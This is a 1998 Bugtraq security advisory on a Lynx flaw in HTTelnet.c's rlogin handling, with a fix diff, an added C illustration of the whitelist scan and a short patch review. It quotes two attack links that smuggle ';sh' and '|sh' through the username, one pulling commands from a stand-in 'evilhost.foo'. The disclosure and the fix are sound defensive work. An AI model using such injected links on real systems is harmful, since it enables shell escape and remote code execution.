[8583] in bugtraq


Lynx

daemon@ATHENA.MIT.EDU (Artur Grabowski)
Tue Nov 17 12:50:53 1998

Date: 	Tue, 17 Nov 1998 17:06:00 +0100
Reply-To: art@STACKEN.KTH.SE
From: Artur Grabowski <art@STACKEN.KTH.SE>
To: BUGTRAQ@NETSPACE.ORG

Lynx has a feature that allows trojans.

For users on systems where lynx is the login shell or somehow the only
program allowed to run, the user can obtain a shell by simply "clicking"
a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.

Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh@evilhost.foo">foo</a>. The login shell
(or something similar) for eviluser@evilhost.foo prints out a few commands
to run on the victim.

The problem is in WWW/Library/Implementation/HTTelnet.c in the function
remote_session. It strips off "bad" characters ('|', ';') from everything
except the username:
        /*
         *      Modified to allow for odd chars in a username only if exists.
         *      05-28-94 Lynx 2-3-1 Garrett Arch Blythe
         */
That was a bad decision.

The obvious fix is to be more paranoid than "user friendly".

//art
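As an added illustration (not code from the post or from Lynx), here is the whitelist scan the post describes in both of its forms: the pre-fix version that starts at the '@' and so never inspects the username, and the post-fix version that scans the whole user@host string. The reject-instead-of-truncate variant at the end is an assumption of this example, not something the post proposes; the function names and the scratch-buffer `apply` helper are likewise invented here, and the sample targets are the two link targets quoted in the post plus one ordinary address.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Characters the post's whitelist loop accepts in an rlogin user@host target:
 * letters, digits, '_', '-', ':', '.', and '@'. Everything else ends the target. */
static int allowed_char(unsigned char c)
{
    return isalnum(c) || c == '_' || c == '-' || c == ':' || c == '.' || c == '@';
}

/* Pre-fix behaviour: scanning starts at the '@' when there is one, so nothing
 * before it (the username) is ever inspected. Truncates target in place. */
void sanitize_skipping_user(char *target)
{
    char *at = strchr(target, '@');
    char *cp;

    for (cp = at ? at : target; *cp != '\0'; cp++) {
        if (!allowed_char((unsigned char)*cp)) {
            *cp = '\0';          /* terminate at the first disallowed character */
            return;
        }
    }
}

/* Post-fix behaviour: the scan covers the whole target, username included. */
void sanitize_whole(char *target)
{
    char *cp;

    for (cp = target; *cp != '\0'; cp++) {
        if (!allowed_char((unsigned char)*cp)) {
            *cp = '\0';
            return;
        }
    }
}

/* Stricter alternative (an assumption of this example, not something the post
 * proposes): accept the target only if every character is on the whitelist, so a
 * crafted link is refused outright instead of silently shortened. Returns 1 if clean. */
int target_is_clean(const char *target)
{
    for (; *target != '\0'; target++)
        if (!allowed_char((unsigned char)*target))
            return 0;
    return 1;
}

/* Copy input into a scratch buffer, run one of the two scanners, return the result.
 * (Hypothetical helper for this example; the buffer is reused between calls.) */
const char *apply(const char *input, int check_username)
{
    static char buf[256];

    strncpy(buf, input, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    if (check_username)
        sanitize_whole(buf);
    else
        sanitize_skipping_user(buf);
    return buf;
}

int main(void)
{
    /* Constructed sample targets: the two from the post plus an ordinary address. */
    const char *targets[] = { "foo;sh@foo", "eviluser|sh@evilhost.foo", "art@stacken.kth.se" };
    size_t i;

    for (i = 0; i < sizeof targets / sizeof targets[0]; i++) {
        printf("%-26s skip-user: %-26s", targets[i], apply(targets[i], 0));
        printf(" whole: %-20s clean: %d\n", apply(targets[i], 1), target_is_clean(targets[i]));
    }
    return 0;
}
```

Run as is, the pre-fix scanner leaves both crafted targets untouched because everything after the '@' is on the whitelist, while the post-fix scanner cuts them down to "foo" and "eviluser"; the ordinary address passes both scanners unchanged and is the only one `target_is_clean` accepts.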

(diff made to the OpenBSD cvs repository, so the line numbers can be wrong)

Index: HTTelnet.c
===================================================================
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c  1998/03/11 17:47:47     1.1.1.1
+++ HTTelnet.c  1998/11/16 17:01:35
@@ -73,8 +73,7 @@
         *  *cp=0;  / * terminate at any ;,<,>,`,|,",' or space or return
         *  or tab to prevent security whole
         */
-       for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
-               cp++)   {
+       for(cp = host; *cp != '\0'; cp++) {
            if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
                                *cp != ':' && *cp != '.' && *cp != '@') {
                *cp = '\0';
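Review bot: the loop still silently truncates `host` at the first disallowed character rather than rejecting the URL, so a target like `foo;sh@foo` turns into a session to `foo` with no indication to the user that anything was dropped; returning an error from remote_session (or refusing to launch the session) when the check fails would be the more paranoid behaviour the post argues for. The comment above the loop also describes a different rule than the code enforces (it lists `;,<,>,\`,|,",'`, space, return and tab, while the code whitelists alphanumerics, `_`, `-`, `:`, `.` and `@`) and reads "security whole" for "hole"; rewording it to describe the whitelist keeps comment and code in step. With the `strchr(host, '@')` start point gone, the older "allow for odd chars in a username" comment in the same function no longer applies and should be removed in the same change.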
